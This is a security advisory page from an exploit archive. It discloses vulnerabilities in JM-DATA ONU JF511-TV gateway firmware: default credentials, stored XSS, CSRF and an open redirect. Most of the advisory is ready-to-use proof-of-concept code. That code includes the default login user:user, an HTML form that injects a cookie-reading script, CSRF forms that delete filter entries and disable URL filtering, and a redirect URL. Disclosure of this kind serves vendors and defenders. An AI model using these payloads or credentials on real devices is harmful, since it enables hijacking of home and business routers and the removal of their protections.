Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- JM-DATA ONU JF511-TV 1.0.67 / 1.0.62 / 1.0.55 XSS / CSRF / Open Redirect[6]
- Authored by Neurogenesia[7] | Site zeroscience.mk[8]
-
JM-DATA ONU JF511-TV versions 1.0.67, 1.0.62, and 1.0.55 suffer from cross site request forgery, persistent cross site scripting, default credential, and open redirection vulnerabilities.
- SHA-256 |
c51066c0cb9048b02b75497475a4a15013a17f7c6f79b27527c10c72ae1fc0c9
- Download[9] | Favorite[10] | View[11]
Change Mirror[12] Download[13]
JM-DATA ONU JF511-TV Multiple Remote Vulnerabilities
Vendor: JM-DATA GmbH
Product web page: https://www.jm-data.at
Affected version: 1.0.67
1.0.62
1.0.55
Summary: This ONU is the perfect GEPON home and business gateway.
It is an all-rounder in perfection. It can BRIDGE/NAT/RIP ROUTEND
and COMBINED.
Desc: The device suffers from multiple vulnerabilities including:
Default Credentials, CSRF, Authenticated Stored XSS and Open Redirect.
Tested on: Boa/0.93.15
Vulnerability discovered by Neurogenesia
@zeroscience
Advisory ID: ZSL-2022-5708
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5708.php
24.04.2022
--
Default credentials:
--------------------
user:user
Stored XSS / HTML Injection:
----------------------------
<html>
<body>
<form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">
<input type="hidden" name="url" value="'><script>alert(document.cookie)</script>' />
<input type="hidden" name="action" value="ad" />
<input type="hidden" name="submit-url" value="/secu_urlfilter_cfg_en.asp" />
<input type="submit" value="Go" />
</form>
</body>
</html>
CSRF (delete IP entry filter):
------------------------------
<html>
<body>
<form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">
<input type="hidden" name="bcdata" value="ld3:idxi0eee" />
<input type="hidden" name="action" value="rm" />
<input type="hidden" name="submit-url" value="/secu_urlfilter_cfg_en.asp" />
<input type="submit" value="Go" />
</form>
<form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">
<input type="hidden" name="urlfilterEnble" value="off" />
<input type="hidden" name="action" value="rm" />
<input type="hidden" name="bcdata" value="ld3:idxi0eed3:idxi1eee" />
<input type="hidden" name="submit-url" value="https://192.168.1.2:8443/secu_urlfilter_cfg_en.asp" />
<input type="submit" value="Go" />
</form>
</body>
</html>
Open Redirect:
--------------
https://192.168.1.2:8443/boaform/formWirelessTbl?submit-url=https://zeroscience.mk
common.js:
----------
/*
* isCharUnsafe - test a character whether is unsafe
* @c: character to test
*/
function isCharUnsafe(c)
{
var unsafeString = "\"\\`\+\,='\t";
return unsafeString.indexOf(c) != -1
|| c.charCodeAt(0) <= 32
|| c.charCodeAt(0) >= 123;
}
/*
* isIncludeInvalidChar - test a string whether includes invalid characters
* @s: string to test
*/
function isIncludeInvalidChar(s)
{
var i;
for (i = 0; i < s.length; i++) {
if (isCharUnsafe(s.charAt(i)) == true)
return true;
}
return false;
}
File Tags
- ActiveX[18] (932)
- Advisory[19] (77,596)
- Arbitrary[20] (15,125)
- BBS[21] (2,859)
- Bypass[22] (1,566)
- CGI[23] (1,011)
- Code Execution[24] (6,675)
- Conference[25] (668)
- Cracker[26] (797)
- CSRF[27] (3,272)
- DoS[28] (21,845)
- Encryption[29] (2,330)
- Exploit[30] (49,829)
- File Inclusion[31] (4,148)
- File Upload[32] (942)
- Firewall[33] (821)
- Info Disclosure[34] (2,548)
- Intrusion Detection[35] (853)
- Java[36] (2,789)
- JavaScript[37] (797)
- Kernel[38] (6,034)
- Local[39] (14,008)
- Magazine[40] (586)
- Overflow[41] (12,178)
- Perl[42] (1,410)
- PHP[43] (5,040)
- Proof of Concept[44] (2,283)
- Protocol[45] (3,307)
- Python[46] (1,395)
- Remote[47] (29,684)
- Root[48] (3,450)
- Ruby[49] (576)
- Scanner[50] (1,630)
- Security Tool[51] (7,685)
- Shell[52] (3,060)
- Shellcode[53] (1,202)
- Sniffer[54] (880)
- Spoof[55] (2,084)
- SQL Injection[56] (16,004)
- TCP[57] (2,359)
- Trojan[58] (675)
- UDP[59] (866)
- Virus[60] (659)
- Vulnerability[61] (30,437)
- Web[62] (9,023)
- Whitepaper[63] (3,714)
- x86[64] (942)
- XSS[65] (17,318)
- Other[66]
File Archives
- June 2022[67]
- May 2022[68]
- April 2022[69]
- March 2022[70]
- February 2022[71]
- January 2022[72]
- December 2021[73]
- November 2021[74]
- October 2021[75]
- September 2021[76]
- August 2021[77]
- July 2021[78]
- Older[79]
Systems
- AIX[80] (426)
- Apple[81] (1,883)
- BSD[82] (368)
- CentOS[83] (55)
- Cisco[84] (1,913)
- Debian[85] (5,948)
- Fedora[86] (1,690)
- FreeBSD[87] (1,241)
- Gentoo[88] (4,152)
- HPUX[89] (878)
- iOS[90] (318)
- iPhone[91] (108)
- IRIX[92] (220)
- Juniper[93] (67)
- Linux[94] (42,281)
- Mac OS X[95] (683)
- Mandriva[96] (3,105)
- NetBSD[97] (255)
- OpenBSD[98] (478)
- RedHat[99] (11,621)
- Slackware[100] (941)
- Solaris[101] (1,607)
- SUSE[102] (1,444)
- Ubuntu[103] (7,838)
- UNIX[104] (9,065)
- UnixWare[105] (185)
- Windows[106] (6,414)
- Other[107]